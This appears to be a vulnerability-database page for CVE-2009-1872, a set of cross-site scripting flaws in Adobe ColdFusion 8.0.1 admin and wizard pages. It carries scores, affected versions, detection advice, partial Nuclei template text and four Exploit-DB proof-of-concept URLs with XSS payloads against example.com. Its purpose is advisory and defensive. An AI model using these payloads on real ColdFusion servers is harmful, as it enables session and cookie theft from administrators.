CVE-2009-1872
published 2009-08-18CVE-2009-1872: Multiple cross-site scripting (XSS) vulnerabilities in Adobe ColdFusion Server 8.0.1, 8, and earlier allow remote attackers to inject arbitrary web script or…
PriorityP272medium4.3CVSS 2.0
AVNACMAuNCNIPAN
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
16.14%
96.5th percentile
Multiple cross-site scripting (XSS) vulnerabilities in Adobe ColdFusion Server 8.0.1, 8, and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm.
Affected
9 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| adobe | coldfusion | <= 8.0.1 | — |
| adobe | coldfusion | — | — |
| adobe | coldfusion | — | — |
| adobe | coldfusion | — | — |
| adobe | coldfusion | — | — |
| adobe | coldfusion | — | — |
| adobe | coldfusion | — | — |
| adobe | coldfusion | — | — |
| adobe | coldfusion | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect XSS probes against the searchlog.cfm endpoint by monitoring for script/style injection payloads in the startRow parameter (e.g., STYLE= or javascript: in the value). ↗
- →Monitor HTTP requests to /CFIDE/administrator/enter.cfm, /CFIDE/wizards/common/_logintowizard.cfm, and /CFIDE/wizards/common/_authenticatewizarduser.cfm for XSS payloads (e.g., >'">, alert(), script tags) in the query string. ↗
- →Alert on requests to ColdFusion CFIDE paths on non-standard port 8500, which is the default ColdFusion standalone server port used in all documented exploit PoCs. ↗
- →Attacker goal is cookie theft; monitor for exfiltration of cookie-based authentication credentials following successful XSS exploitation against ColdFusion administrator paths. ↗
- ·All four vulnerable endpoints reside under the /CFIDE/ directory tree, which is the ColdFusion administrator/wizard virtual path. Exposure of /CFIDE/ to untrusted networks is the root enabler of this CVE. ↗
- ·The vulnerability affects ColdFusion 8.0.1 and all earlier versions; patching or restricting access to the /CFIDE/administrator/ and /CFIDE/wizards/ paths is required. ↗
CVSS provenance
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:N
vulncheck4.3MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-w646-98fx-2v93: Multiple cross-site scripting (XSS) vulnerabilities in Adobe ColdFusion Server 8
ghsa_unreviewed·2022-05-02
CVE-2009-1872 [MEDIUM] CWE-79 GHSA-w646-98fx-2v93: Multiple cross-site scripting (XSS) vulnerabilities in Adobe ColdFusion Server 8
Multiple cross-site scripting (XSS) vulnerabilities in Adobe ColdFusion Server 8.0.1, 8, and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm.
VulnCheck
Adobe ColdFusion Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
vulncheck·2009·CVSS 4.3
CVE-2009-1872 [MEDIUM] Adobe ColdFusion Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Adobe ColdFusion Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Multiple cross-site scripting (XSS) vulnerabilities in Adobe ColdFusion Server 8.0.1, 8, and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm.
Affected: Adobe ColdFusion
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f
No detection rules found.
Exploit-DB
Adobe ColdFusion Server 8.0.1 - 'administrator/logviewer/searchlog.cfm?startRow' Cross-Site Scripting
exploitdb·2009-08-17
CVE-2009-1872 Adobe ColdFusion Server 8.0.1 - 'administrator/logviewer/searchlog.cfm?startRow' Cross-Site Scripting
Adobe ColdFusion Server 8.0.1 - 'administrator/logviewer/searchlog.cfm?startRow' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/36046/info
Adobe ColdFusion is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would run in the context of the affected application, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
Adobe ColdFusion 8.0.1 and earlier are vulnerable.
http://www.example.com:8500/CFIDE/administrator/logviewer/searchlog.cfm?viewShort=0&sortBy=&filter=CurrentFilter&startRow=22%22%20%20STYLE=%22back
Exploit-DB
Adobe ColdFusion Server 8.0.1 - '/administrator/enter.cfm' Query String Cross-Site Scripting
exploitdb·2009-08-17
CVE-2009-1872 Adobe ColdFusion Server 8.0.1 - '/administrator/enter.cfm' Query String Cross-Site Scripting
Adobe ColdFusion Server 8.0.1 - '/administrator/enter.cfm' Query String Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/36046/info
Adobe ColdFusion is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would run in the context of the affected application, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
Adobe ColdFusion 8.0.1 and earlier are vulnerable.
http://www.example.com:8500/CFIDE/administrator/enter.cfm?>'">alert('DSECRG_XSS')
Exploit-DB
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_authenticatewizarduser.cfm' Query String Cross-Site Scripting
exploitdb·2009-08-17
CVE-2009-1872 Adobe ColdFusion Server 8.0.1 - '/wizards/common/_authenticatewizarduser.cfm' Query String Cross-Site Scripting
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_authenticatewizarduser.cfm' Query String Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/36046/info
Adobe ColdFusion is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would run in the context of the affected application, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
Adobe ColdFusion 8.0.1 and earlier are vulnerable.
http://www.example.com:8500/CFIDE/wizards/common/_authenticatewizarduser.cfm?>'">alert('DSECRG_XSS')
Exploit-DB
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_logintowizard.cfm' Query String Cross-Site Scripting
exploitdb·2009-08-17
CVE-2009-1872 Adobe ColdFusion Server 8.0.1 - '/wizards/common/_logintowizard.cfm' Query String Cross-Site Scripting
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_logintowizard.cfm' Query String Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/36046/info
Adobe ColdFusion is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would run in the context of the affected application, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
Adobe ColdFusion 8.0.1 and earlier are vulnerable.
http://www.example.com:8500/CFIDE/wizards/common/_logintowizard.cfm?>'">alert('DSECRG_XSS')
Nuclei
Adobe Coldfusion <=8.0.1 - Cross-Site Scripting
nuclei·CVSS 4.3
CVE-2009-1872 [MEDIUM] Adobe Coldfusion <=8.0.1 - Cross-Site Scripting
Adobe Coldfusion alert(document.domain)"
- type: word
part: body
words:
- "ColdFusion"
case-insensitive: true
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a0047304502201ff8198f440bc3c26ded9a076bb60410fcf7147d07aef119a6ced17ac9aede4a022100a272b88ce7c3b164494a36f6b53564489b58a31290b2aa8dc58c25c7e3640044:922c64590222798bb761d5b6d8e72950
http://osvdb.org/57182http://osvdb.org/57183http://osvdb.org/57184http://osvdb.org/57185http://www.adobe.com/support/security/bulletins/apsb09-12.htmlhttp://www.dsecrg.com/pages/vul/show.php?id=122http://www.securityfocus.com/archive/1/505803/100/0/threadedhttp://osvdb.org/57182http://osvdb.org/57183http://osvdb.org/57184http://osvdb.org/57185http://www.adobe.com/support/security/bulletins/apsb09-12.htmlhttp://www.dsecrg.com/pages/vul/show.php?id=122http://www.securityfocus.com/archive/1/505803/100/0/threaded
2009-08-18
Published
Exploited in the wild